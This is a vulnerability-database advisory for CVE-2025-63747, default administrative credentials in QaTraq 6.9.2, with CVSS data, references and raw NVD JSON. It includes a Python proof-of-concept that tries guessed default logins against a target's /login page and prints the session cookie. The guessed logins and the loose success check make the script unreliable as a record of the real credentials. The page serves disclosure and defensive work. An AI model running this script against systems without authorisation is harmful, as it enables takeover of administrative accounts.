CVE-2025-63747

Description

QaTraq 6.9.2 ships with administrative account credentials which are enabled in default installations and permit immediate login via the web application login page. Because the account provides administrative privileges in the default configuration, an attacker who can reach the login page can gain administrative access.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:testmanagement:qatraq:6.9.2:*:*:*:*:*:*:* - VULNERABLE

QaTraq < 6.9.2 (potentially all versions with default credentials)

QaTraq 6.9.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-63747 PoC - QaTraq 6.9.2 Default Credentials
This PoC demonstrates how to exploit the default credentials vulnerability
in QaTraq 6.9.2 to gain administrative access.
"""

import requests
import sys
from urllib.parse import urljoin

def exploit_qatraq_default_creds(target_url):
    """
    Exploit CVE-2025-63747 by using default credentials
    """
    # Common default credentials for QaTraq
    default_credentials = [
        {'username': 'admin', 'password': 'admin'},
        {'username': 'admin', 'password': 'qatraq'},
        {'username': 'administrator', 'password': 'administrator'},
        {'username': 'admin', 'password': 'password123'},
        {'username': 'qatraq', 'password': 'qatraq'},
    ]
    
    # Target login endpoint
    login_url = urljoin(target_url, '/login')
    
    print(f'[*] Target: {target_url}')
    print(f'[*] Login URL: {login_url}')
    print(f'[*] Testing default credentials...')
    
    session = requests.Session()
    
    for cred in default_credentials:
        try:
            # Prepare login request
            login_data = {
                'username': cred['username'],
                'password': cred['password'],
                'Login': 'Login'  # Common form submit button name
            }
            
            # Send login request
            response = session.post(
                login_url,
                data=login_data,
                timeout=10,
                allow_redirects=True
            )
            
            # Check if login successful
            if response.status_code == 200:
                # Check for indicators of successful login
                if 'admin' in response.text.lower() or 'logout' in response.text.lower():
                    print(f'[+] SUCCESS! Valid credentials found:')
                    print(f'    Username: {cred["username"]}')
                    print(f'    Password: {cred["password"]}')
                    print(f'[*] Session Cookie: {session.cookies.get_dict()}')
                    
                    # Try to access admin panel
                    admin_url = urljoin(target_url, '/admin')
                    admin_response = session.get(admin_url)
                    if admin_response.status_code == 200:
                        print(f'[+] Successfully accessed admin panel!')
                    
                    return True
                    
        except requests.RequestException as e:
            print(f'[-] Error testing credentials: {e}')
            continue
    
    print('[-] No valid default credentials found')
    return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python3 {sys.argv[0]} <target_url>')
        print(f'Example: python3 {sys.argv[0]} http://vulnerable-server:8080')
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_qatraq_default_creds(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63747
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63747
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63747/
[4] VulDB https://vuldb.com/cve/CVE-2025-63747
[5] http://qatraq.com
[6] https://bitsbyamg.com/blog/post/2025/10/19/qatraq-692-default-creds-and-file-upload-rce

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63747", "sourceIdentifier": "[email protected]", "published": "2025-11-17T16:15:50.463", "lastModified": "2025-11-26T15:50:35.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "QaTraq 6.9.2 ships with administrative account credentials which are enabled in default installations and permit immediate login via the web application login page. Because the account provides administrative privileges in the default configuration, an attacker who can reach the login page can gain administrative access."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-521"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:testmanagement:qatraq:6.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "A3D245F7-826C-4C43-9A60-338A4C59CE75"}]}]}], "references": [{"url": "http://qatraq.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://bitsbyamg.com/blog/post/2025/10/19/qatraq-692-default-creds-and-file-upload-rce", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}